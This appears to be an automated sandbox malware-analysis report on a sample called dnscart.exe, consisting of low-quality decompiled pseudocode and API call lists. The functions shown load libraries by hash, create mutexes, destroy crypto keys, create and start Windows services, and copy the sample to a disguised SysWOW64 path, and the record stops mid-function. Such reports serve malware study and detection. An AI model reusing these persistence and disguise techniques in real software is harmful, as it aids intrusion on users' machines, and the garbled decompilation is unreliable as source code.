HeapFree.KERNEL32(00000000), ref: 001F8B56

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F866C, Relevance: 5.0, APIs: 4, Instructions: 22

C-Code - Quality: 35%

			E001F866C(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi) {
				void* _t10;
				void _t28;
				intOrPtr _t31;
				void* _t32;
				void* _t35;
				intOrPtr* _t40;
				void* _t42;
				void* _t44;

				_t40 = __edi;
				_t32 = __ebx;
				if(L001F1E80(_t10, __ecx, __edx) != 0) {
					goto 0x33168c;
					asm("int3");
					asm("int3");
					if(L001F2560(__edx, _t40) != 0) {
						_t35 =  *(_t44 - 0x10);
						_t28 =  *_t35;
						 *_t32 = _t28;
						if(_t28 < 0x4000000) {
							_push(_t32);
							_t31 = L001F8500(_t35 + 4,  *((intOrPtr*)(_t44 - 0xc)) - 4, _t40);
							_t35 =  *(_t44 - 0x10);
							 *_t40 = _t31;
						}
						HeapFree(GetProcessHeap(), 0, _t35);
					}
					HeapFree(GetProcessHeap(), ??, ??);
				}
				 *0x1fc260( *((intOrPtr*)(_t44 - 0x30)));
				 *0x1fc260( *((intOrPtr*)(_t44 - 0x34)));
				 *0x1fc260( *((intOrPtr*)(_t44 - 0x38)));
				HeapFree(GetProcessHeap(), 0, 0);
				HeapFree(GetProcessHeap(), 0, _t42);
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				return 0 |  *_t40 != 0x00000000;
			}

0x001f866c
0x001f866c
0x001f8676
0x001f8678
0x001f867d
0x001f867e
0x001f8689
0x001f868b
0x001f868e
0x001f8690
0x001f8697
0x001f869f
0x001f86a3
0x001f86a8
0x001f86ae
0x001f86ae
0x001f86ba
0x001f86ba
0x001f86cc
0x001f86cc
0x001f86d5
0x001f86de
0x001f86e7
0x001f86f8
0x001f8708
0x001f871a
0x001f872c
0x001f873f

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 001F86F1
HeapFree.KERNEL32(00000000), ref: 001F86F8
GetProcessHeap.KERNEL32(00000000,?), ref: 001F8701
HeapFree.KERNEL32(00000000), ref: 001F8708

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F8656, Relevance: 5.0, APIs: 4, Instructions: 20

C-Code - Quality: 22%

			E001F8656(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi) {
				void _t28;
				intOrPtr _t31;
				void* _t32;
				void* _t35;
				void* _t37;
				intOrPtr* _t40;
				void* _t42;
				void* _t44;

				_t40 = __edi;
				_t37 = __edx;
				_t32 = __ebx;
				if(L001F1D40(__ecx) != 0) {
					goto 0x331674;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					if(L001F1E80(_t10, __ecx, _t37) != 0) {
						goto 0x33168c;
						asm("int3");
						asm("int3");
						if(L001F2560(_t37, _t40) != 0) {
							_t35 =  *(_t44 - 0x10);
							_t28 =  *_t35;
							 *_t32 = _t28;
							if(_t28 < 0x4000000) {
								_push(_t32);
								_t31 = L001F8500(_t35 + 4,  *((intOrPtr*)(_t44 - 0xc)) - 4, _t40);
								_t35 =  *(_t44 - 0x10);
								 *_t40 = _t31;
							}
							HeapFree(GetProcessHeap(), 0, _t35);
						}
						HeapFree(GetProcessHeap(), ??, ??);
					}
					 *0x1fc260( *((intOrPtr*)(_t44 - 0x30)));
				}
				 *0x1fc260( *((intOrPtr*)(_t44 - 0x34)));
				 *0x1fc260( *((intOrPtr*)(_t44 - 0x38)));
				HeapFree(GetProcessHeap(), 0, 0);
				HeapFree(GetProcessHeap(), 0, _t42);
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				return 0 |  *_t40 != 0x00000000;
			}

0x001f8656
0x001f8656
0x001f8656
0x001f8660
0x001f8662
0x001f8667
0x001f8668
0x001f8669
0x001f866a
0x001f866b
0x001f8676
0x001f8678
0x001f867d
0x001f867e
0x001f8689
0x001f868b
0x001f868e
0x001f8690
0x001f8697
0x001f869f
0x001f86a3
0x001f86a8
0x001f86ae
0x001f86ae
0x001f86ba
0x001f86ba
0x001f86cc
0x001f86cc
0x001f86d5
0x001f86d5
0x001f86de
0x001f86e7
0x001f86f8
0x001f8708
0x001f871a
0x001f872c
0x001f873f

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 001F86F1
HeapFree.KERNEL32(00000000), ref: 001F86F8
GetProcessHeap.KERNEL32(00000000,?), ref: 001F8701
HeapFree.KERNEL32(00000000), ref: 001F8708

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F992A, Relevance: 5.0, APIs: 4, Instructions: 17

APIs

GetProcessHeap.KERNEL32 ref: 001F992A
HeapFree.KERNEL32(00000000), ref: 001F9931
GetProcessHeap.KERNEL32(00000000,?,?,00000001), ref: 001F994A
HeapFree.KERNEL32(00000000), ref: 001F9951

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Analysis Process: dnscart.exe PID: 1844 Parent PID: 2264

Execution Graph

Execution Coverage:	7.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	12.8%
Total number of Nodes:	525
Total number of Limit Nodes:	19

Executed Functions

Function 002291F0, Relevance: 21.1, APIs: 14, Instructions: 64
encryptiontime

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 22%

			E002291F0(signed int __ecx) {
				void* _t3;
				long _t12;
				long _t19;
				int _t21;
				signed int _t23;
				void* _t25;
				void* _t28;

				_t23 = __ecx;
				_t3 = CreateEventW(??, ??, ??, ??);
				 *0x22c29c = _t3;
				if(_t3 != 0) {
					_t19 = SignalObjectAndWait(_t3,  *0x22c2a0, 0xffffffff, 0);
					if(_t19 == 0 || _t19 == 0x80) {
						_t21 = ResetEvent( *0x22c29c);
					}
				}
				ReleaseMutex(_t25);
				CloseHandle(_t25);
				if(_t21 != 0) {
					_t12 = GetTickCount(); // executed
					_push(0x10);
					_push(0x3e8);
					_push(0x1388);
					_push(0);
					 *0x22c280 = 1;
					_push(E00228E20);
					 *0x22c278 = _t12 + 0x1388;
					_push(0);
					_push(_t28 - 8);
					if( *0x22c188() != 0) {
						WaitForSingleObject( *0x22c29c, 0xffffffff);
						 *0x22c11c(0,  *((intOrPtr*)(_t28 - 8)), 0xffffffff);
					}
					CloseHandle( *0x22c29c);
				}
				 *0x22c048( *0x22c288); // executed
				CryptDestroyKey( *0x22c28c); // executed
				CryptDestroyKey( *0x22c290); // executed
				CryptReleaseContext( *0x22c284, 0); // executed
				E00228AE0(_t21);
				return E0022A7A0(_t23 | 0xffffffff);
			}

0x002291f0
0x002291f0
0x002291f6
0x002291fd
0x0022920a
0x00229212
0x00229227
0x00229227
0x00229212
0x0022922a
0x00229231
0x00229239
0x0022923b
0x00229241
0x00229243
0x00229248
0x0022924d
0x00229254
0x0022925e
0x00229263
0x0022926b
0x0022926d
0x00229276
0x00229280
0x0022928d
0x0022928d
0x00229299
0x00229299
0x002292a5
0x002292b1
0x002292bd
0x002292cb
0x002292d1
0x002292e4

APIs

CreateEventW.KERNEL32 ref: 002291F0
SignalObjectAndWait.KERNEL32(00000000,000000FF,00000000), ref: 0022920A
ResetEvent.KERNEL32 ref: 00229221
ReleaseMutex.KERNEL32 ref: 0022922A
CloseHandle.KERNEL32 ref: 00229231
GetTickCount.KERNEL32 ref: 0022923B
CreateTimerQueueTimer.KERNEL32(?,00000000,Function_00008E20,00000000,00001388,000003E8,00000010), ref: 0022926E
WaitForSingleObject.KERNEL32(000000FF), ref: 00229280
DeleteTimerQueueTimer.KERNEL32(00000000,?,000000FF), ref: 0022928D
CloseHandle.KERNEL32 ref: 00229299
CryptDestroyHash.ADVAPI32 ref: 002292A5
CryptDestroyKey.ADVAPI32 ref: 002292B1
CryptDestroyKey.ADVAPI32 ref: 002292BD
CryptReleaseContext.ADVAPI32(00000000), ref: 002292CB

Part of subcall function 0022A7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0022A7B8
Part of subcall function 0022A7A0: CloseHandle.KERNEL32(?), ref: 0022A7CC
Part of subcall function 0022A7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00228F95), ref: 0022A7D5
Part of subcall function 0022A7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 0022A7DC

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 0022914E, Relevance: 16.6, APIs: 11, Instructions: 62
encryption

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 18%

			E0022914E(void* __ecx, void* __edx, void* __eflags) {
				void* _t21;
				void* _t28;
				long _t31;
				long _t38;
				int _t40;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t52;

				asm("scasb");
				asm("int3");
				L00221830(__ecx, __edx);
				_t49 =  *(_t52 - 4);
				 *0x22c20c(_t52 - 0x188, 0x40, _t49,  *0x22c27c);
				HeapFree(GetProcessHeap(), 0, _t49);
				L00221830(0x221264, 0xc);
				_t50 =  *(_t52 - 4);
				 *0x22c20c(_t52 - 0x108, 0x40, _t50,  *0x22c27c, 0x4b85ca91, _t52 - 4);
				HeapFree(GetProcessHeap(), 0, _t50);
				_t21 = CreateMutexW(0, 0, _t52 - 0x108); // executed
				 *0x22c2a0 = _t21;
				if(_t21 != 0) {
					goto 0x231924;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t28 = CreateEventW();
					 *0x22c29c = _t28;
					if(_t28 != 0) {
						_t38 = SignalObjectAndWait(_t28,  *0x22c2a0, 0xffffffff, 0);
						if(_t38 == 0 || _t38 == 0x80) {
							_t40 = ResetEvent( *0x22c29c);
						}
					}
					ReleaseMutex(_t47);
					CloseHandle(_t47);
					if(_t40 != 0) {
						_t31 = GetTickCount(); // executed
						_push(0x10);
						_push(0x3e8);
						_push(0x1388);
						_push(0);
						 *0x22c280 = 1;
						_push(E00228E20);
						 *0x22c278 = _t31 + 0x1388;
						_push(0);
						_push(_t52 - 8);
						if( *0x22c188() != 0) {
							WaitForSingleObject( *0x22c29c, 0xffffffff);
							 *0x22c11c(0,  *((intOrPtr*)(_t52 - 8)), 0xffffffff);
						}
						CloseHandle( *0x22c29c);
					}
				}
				 *0x22c048( *0x22c288); // executed
				CryptDestroyKey( *0x22c28c); // executed
				CryptDestroyKey( *0x22c290); // executed
				CryptReleaseContext( *0x22c284, 0); // executed
				E00228AE0(_t40);
				return E0022A7A0(0xffffffffffffffff);
			}

0x0022914e
0x0022914f
0x00229150
0x0022915b
0x00229168
0x0022917b
0x00229194
0x0022919f
0x002291ac
0x002291bf
0x002291d0
0x002291d6
0x002291dd
0x002291e3
0x002291e8
0x002291e9
0x002291ea
0x002291eb
0x002291ec
0x002291ed
0x002291ee
0x002291ef
0x002291f0
0x002291f6
0x002291fd
0x0022920a
0x00229212
0x00229227
0x00229227
0x00229212
0x0022922a
0x00229231
0x00229239
0x0022923b
0x00229241
0x00229243
0x00229248
0x0022924d
0x00229254
0x0022925e
0x00229263
0x0022926b
0x0022926d
0x00229276
0x00229280
0x0022928d
0x0022928d
0x00229299
0x00229299
0x00229239
0x002292a5
0x002292b1
0x002292bd
0x002292cb
0x002292d1
0x002292e4

APIs

_snwprintf.NTDLL ref: 00229168
GetProcessHeap.KERNEL32(00000000,?), ref: 00229174
HeapFree.KERNEL32(00000000), ref: 0022917B
_snwprintf.NTDLL ref: 002291AC
GetProcessHeap.KERNEL32(00000000,?), ref: 002291B8
HeapFree.KERNEL32(00000000), ref: 002291BF
CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 002291D0
CryptDestroyHash.ADVAPI32 ref: 002292A5
CryptDestroyKey.ADVAPI32 ref: 002292B1
CryptDestroyKey.ADVAPI32 ref: 002292BD
CryptReleaseContext.ADVAPI32(00000000), ref: 002292CB

Part of subcall function 0022A7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0022A7B8
Part of subcall function 0022A7A0: CloseHandle.KERNEL32(?), ref: 0022A7CC
Part of subcall function 0022A7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00228F95), ref: 0022A7D5
Part of subcall function 0022A7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 0022A7DC

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 002290BE, Relevance: 15.1, APIs: 10, Instructions: 57
encryption

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E002290BE(void* __eflags) {
				void* _t22;
				long _t29;
				void* _t42;
				void* _t43;
				long _t46;
				long _t53;
				int _t55;
				signed int _t57;
				void* _t61;
				void* _t63;
				void* _t65;
				void* _t66;
				void* _t67;

				_t55 = 0;
				memset(0x22c284, 0, ??);
				_t57 = 0x221364;
				_t2 = _t55 + 0xc; // 0xc
				_t59 = _t2;
				L00221830(0x221364, _t2);
				_t63 =  *(_t67 - 4);
				 *0x22c20c(_t67 - 0x88, 0x40, _t63,  *0x22c27c, 0x4b85ca91, _t67 - 4);
				HeapFree(GetProcessHeap(), 0, _t63);
				_t22 = CreateMutexW(0, 0, _t67 - 0x88); // executed
				_t61 = _t22;
				if(_t61 != 0) {
					_t29 = WaitForSingleObject(_t61, 0);
					if(_t29 == 0 || _t29 == 0x80) {
						goto 0x231903;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("scasb");
						asm("int3");
						L00221830(_t57, _t59);
						_t65 =  *(_t67 - 4);
						 *0x22c20c(_t67 - 0x188, 0x40, _t65,  *0x22c27c);
						HeapFree(GetProcessHeap(), 0, _t65);
						_t57 = 0x221264;
						L00221830(0x221264, 0xc);
						_t66 =  *(_t67 - 4);
						 *0x22c20c(_t67 - 0x108, 0x40, _t66,  *0x22c27c, 0x4b85ca91, _t67 - 4);
						HeapFree(GetProcessHeap(), 0, _t66);
						_t42 = CreateMutexW(0, 0, _t67 - 0x108); // executed
						 *0x22c2a0 = _t42;
						if(_t42 != 0) {
							goto 0x231924;
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_t43 = CreateEventW();
							 *0x22c29c = _t43;
							if(_t43 != 0) {
								_t53 = SignalObjectAndWait(_t43,  *0x22c2a0, 0xffffffff, 0);
								if(_t53 == 0 || _t53 == 0x80) {
									_t55 = ResetEvent( *0x22c29c);
								}
							}
							ReleaseMutex(_t61);
							CloseHandle(_t61);
							if(_t55 != 0) {
								_t46 = GetTickCount(); // executed
								_push(0x10);
								_push(0x3e8);
								_push(0x1388);
								_push(0);
								 *0x22c280 = 1;
								_push(E00228E20);
								 *0x22c278 = _t46 + 0x1388;
								_push(0);
								_push(_t67 - 8);
								if( *0x22c188() != 0) {
									WaitForSingleObject( *0x22c29c, 0xffffffff);
									 *0x22c11c(0,  *((intOrPtr*)(_t67 - 8)), 0xffffffff);
								}
								CloseHandle( *0x22c29c);
							}
						}
					}
				}
				 *0x22c048( *0x22c288); // executed
				CryptDestroyKey( *0x22c28c); // executed
				CryptDestroyKey( *0x22c290); // executed
				CryptReleaseContext( *0x22c284, 0); // executed
				E00228AE0(_t55);
				return E0022A7A0(_t57 | 0xffffffff);
			}

0x002290be
0x002290c6
0x002290cf
0x002290da
0x002290da
0x002290dd
0x002290e8
0x002290f5
0x00229107
0x00229116
0x0022911c
0x00229120
0x00229128
0x00229130
0x0022913d
0x00229142
0x00229143
0x00229144
0x00229145
0x00229146
0x00229147
0x00229148
0x00229149
0x0022914a
0x0022914b
0x0022914c
0x0022914d
0x0022914e
0x0022914f
0x00229150
0x0022915b
0x00229168
0x0022917b
0x0022918f
0x00229194
0x0022919f
0x002291ac
0x002291bf
0x002291d0
0x002291d6
0x002291dd
0x002291e3
0x002291e8
0x002291e9
0x002291ea
0x002291eb
0x002291ec
0x002291ed
0x002291ee
0x002291ef
0x002291f0
0x002291f6
0x002291fd
0x0022920a
0x00229212
0x00229227
0x00229227
0x00229212
0x0022922a
0x00229231
0x00229239
0x0022923b
0x00229241
0x00229243
0x00229248
0x0022924d
0x00229254
0x0022925e
0x00229263
0x0022926b
0x0022926d
0x00229276
0x00229280
0x0022928d
0x0022928d
0x00229299
0x00229299
0x00229239
0x002291dd
0x00229130
0x002292a5
0x002292b1
0x002292bd
0x002292cb
0x002292d1
0x002292e4

APIs

memset.NTDLL ref: 002290C6
_snwprintf.NTDLL ref: 002290F5
GetProcessHeap.KERNEL32(00000000,?), ref: 00229100
HeapFree.KERNEL32(00000000), ref: 00229107
CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 00229116
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00229128
CryptDestroyHash.ADVAPI32 ref: 002292A5
CryptDestroyKey.ADVAPI32 ref: 002292B1
CryptDestroyKey.ADVAPI32 ref: 002292BD
CryptReleaseContext.ADVAPI32(00000000), ref: 002292CB

Part of subcall function 0022A7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0022A7B8
Part of subcall function 0022A7A0: CloseHandle.KERNEL32(?), ref: 0022A7CC
Part of subcall function 0022A7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00228F95), ref: 0022A7D5
Part of subcall function 0022A7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 0022A7DC

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00229960, Relevance: 4.5, APIs: 3, Instructions: 12

C-Code - Quality: 25%

			E00229960() {
				void* _t6;
				void* _t8;

				StartServiceW(); // executed
				CloseServiceHandle(_t8);
				CloseServiceHandle(_t6);
				return 1;
			}

0x00229960
0x00229967
0x0022996e
0x0022997f

APIs

StartServiceW.ADVAPI32 ref: 00229960
CloseServiceHandle.ADVAPI32 ref: 00229967
CloseServiceHandle.ADVAPI32 ref: 0022996E

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 0022985F, Relevance: 3.0, APIs: 2, Instructions: 34

APIs

EnumServicesStatusExW.ADVAPI32 ref: 0022985F
OpenServiceW.ADVAPI32(?,?,00000001), ref: 0022989D

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 002297B3, Relevance: 1.5, APIs: 1, Instructions: 28

APIs

CreateServiceW.ADVAPI32 ref: 002297C8

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00229CB6, Relevance: 36.2, APIs: 24, Instructions: 178
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 39%

			E00229CB6(void* __ecx, void* __edx, void* __edi) {
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t29;
				struct HINSTANCE__* _t35;
				struct HINSTANCE__* _t41;
				struct HINSTANCE__* _t47;
				struct HINSTANCE__* _t53;
				struct HINSTANCE__* _t59;
				void* _t63;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t106;

				_t96 = __edi;
				asm("scasb");
				asm("int3");
				L00221830(__ecx, __edx);
				_t97 =  *(_t106 - 4);
				_t17 = LoadLibraryW(_t97);
				_push(0x22c040);
				_push(0x30116feb);
				_push(0x21);
				L00221B10(_t17, 0x221040, _t96, _t97);
				HeapFree(GetProcessHeap(), 0, _t97);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L00221830(0x221568, 0xc);
				_t98 =  *(_t106 - 4);
				_t23 = LoadLibraryW(_t98);
				_push(0x22c0c8);
				_push(0x1f598772);
				_push(1);
				L00221B10(_t23, 0x221024, _t96, _t98);
				HeapFree(GetProcessHeap(), 0, _t98);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L00221830(0x221574, 0xc);
				_t99 =  *(_t106 - 4);
				_t29 = LoadLibraryW(_t99);
				_push(0x22c214);
				_push(0x41696925);
				_push(2);
				L00221B10(_t29, 0x221028, _t96, _t99);
				HeapFree(GetProcessHeap(), 0, _t99);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L00221830(0x221580, 0xc);
				_t100 =  *(_t106 - 4);
				_t35 = LoadLibraryW(_t100); // executed
				_push(0x22c0c4);
				_push(0x37dff52a);
				_push(1);
				L00221B10(_t35, 0x22100c, _t96, _t100);
				HeapFree(GetProcessHeap(), 0, _t100);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L00221830(0x221550, 0xc);
				_t101 =  *(_t106 - 4);
				_t41 = LoadLibraryW(_t101); // executed
				_push(0x22c0cc);
				_push(0x14c87d5f);
				_push(1);
				L00221B10(_t41, 0x2210c4, _t96, _t101);
				HeapFree(GetProcessHeap(), 0, _t101);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L00221830(0x221544, 0xc);
				_t102 =  *(_t106 - 4);
				_t47 = LoadLibraryW(_t102); // executed
				_push(0x22c21c);
				_push(0x786d5b64);
				_push(2);
				L00221B10(_t47, 0x2210c8, _t96, _t102);
				HeapFree(GetProcessHeap(), 0, _t102);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L00221830(0x221598, 0xc);
				_t103 =  *(_t106 - 4);
				_t53 = LoadLibraryW(_t103);
				_push(0x22c230);
				_push(0x53973344);
				_push(0xe);
				L00221B10(_t53, 0x221220, _t96, _t103);
				HeapFree(GetProcessHeap(), 0, _t103);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L00221830(0x22158c, 0xc);
				_t104 =  *(_t106 - 4);
				_t59 = LoadLibraryW(_t104); // executed
				_push(0x22c224);
				_push(0x221bf2d2);
				_push(3);
				L00221B10(_t59, 0x221214, _t96, _t104);
				HeapFree(GetProcessHeap(), 0, _t104); // executed
				_t63 = L002292F0(_t59); // executed
				return _t63;
			}

0x00229cb6
0x00229cb6
0x00229cb7
0x00229cb8
0x00229cbd
0x00229cc4
0x00229cca
0x00229ccf
0x00229cd4
0x00229cdd
0x00229cef
0x00229cfd
0x00229cfe
0x00229d08
0x00229d0d
0x00229d14
0x00229d1a
0x00229d1f
0x00229d24
0x00229d2d
0x00229d3f
0x00229d4d
0x00229d4e
0x00229d58
0x00229d5d
0x00229d64
0x00229d6a
0x00229d6f
0x00229d74
0x00229d7d
0x00229d8f
0x00229d9d
0x00229d9e
0x00229da8
0x00229dad
0x00229db4
0x00229dba
0x00229dbf
0x00229dc4
0x00229dcd
0x00229ddf
0x00229ded
0x00229dee
0x00229df8
0x00229dfd
0x00229e04
0x00229e0a
0x00229e0f
0x00229e14
0x00229e1d
0x00229e2f
0x00229e3d
0x00229e3e
0x00229e48
0x00229e4d
0x00229e54
0x00229e5a
0x00229e5f
0x00229e64
0x00229e6d
0x00229e7f
0x00229e8d
0x00229e8e
0x00229e98
0x00229e9d
0x00229ea4
0x00229eaa
0x00229eaf
0x00229eb4
0x00229ebd
0x00229ecf
0x00229edd
0x00229ede
0x00229ee8
0x00229ef0
0x00229ef4
0x00229efa
0x00229eff
0x00229f04
0x00229f0d
0x00229f1f
0x00229f25
0x00229f2e

APIs

LoadLibraryW.KERNEL32(?), ref: 00229CC4
GetProcessHeap.KERNEL32(00000000,?), ref: 00229CE8
HeapFree.KERNEL32(00000000), ref: 00229CEF
LoadLibraryW.KERNEL32(?), ref: 00229D14
GetProcessHeap.KERNEL32(00000000,?), ref: 00229D38
HeapFree.KERNEL32(00000000), ref: 00229D3F
LoadLibraryW.KERNEL32(?), ref: 00229D64
GetProcessHeap.KERNEL32(00000000,?), ref: 00229D88
HeapFree.KERNEL32(00000000), ref: 00229D8F
LoadLibraryW.KERNEL32(?), ref: 00229DB4
GetProcessHeap.KERNEL32(00000000,?), ref: 00229DD8
HeapFree.KERNEL32(00000000), ref: 00229DDF
LoadLibraryW.KERNEL32(?), ref: 00229E04
GetProcessHeap.KERNEL32(00000000,?), ref: 00229E28
HeapFree.KERNEL32(00000000), ref: 00229E2F
LoadLibraryW.KERNEL32(?), ref: 00229E54
GetProcessHeap.KERNEL32(00000000,?), ref: 00229E78
HeapFree.KERNEL32(00000000), ref: 00229E7F
LoadLibraryW.KERNEL32(?), ref: 00229EA4
GetProcessHeap.KERNEL32(00000000,?), ref: 00229EC8
HeapFree.KERNEL32(00000000), ref: 00229ECF
LoadLibraryW.KERNEL32(?), ref: 00229EF4
GetProcessHeap.KERNEL32(00000000,?), ref: 00229F18
HeapFree.KERNEL32(00000000), ref: 00229F1F

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 002294C1, Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 76

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 15%

			E002294C1(void* __ecx, signed short __edx, void* __eflags) {
				void* _t17;
				int _t20;
				signed int _t27;
				void* _t28;
				void* _t30;
				void* _t36;
				signed short* _t38;
				signed short _t39;
				void* _t40;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t48;

				_t39 = __edx;
				L00221830(__ecx, __edx);
				_t41 =  *(_t45 - 4);
				 *0x22c20c("C:\Windows\SysWOW64", 0x104, _t41, "C:\Windows\SysWOW64", "certcache");
				HeapFree(GetProcessHeap(), 0, _t41);
				_t42 =  *(_t45 - 8);
				 *0x22c20c("C:\Windows\SysWOW64\certcache.exe", 0x104, _t42, "C:\Windows\SysWOW64", "certcache");
				_t48 = _t46 + 0x30;
				HeapFree(GetProcessHeap(), 0, _t42);
				_t17 = CreateFileW("C:\Users\joeykelly\Desktop\dnscart.exe", 0x80000000, 1, 0, 3, 0, 0); // executed
				_t43 = _t17;
				if(_t43 != 0xffffffff) {
					goto 0x2319c0;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3"); // executed
					_t28 = CreateFileMappingW(); // executed
					_t40 = _t28;
					if(_t40 != 0) {
						goto 0x2319d9;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3"); // executed
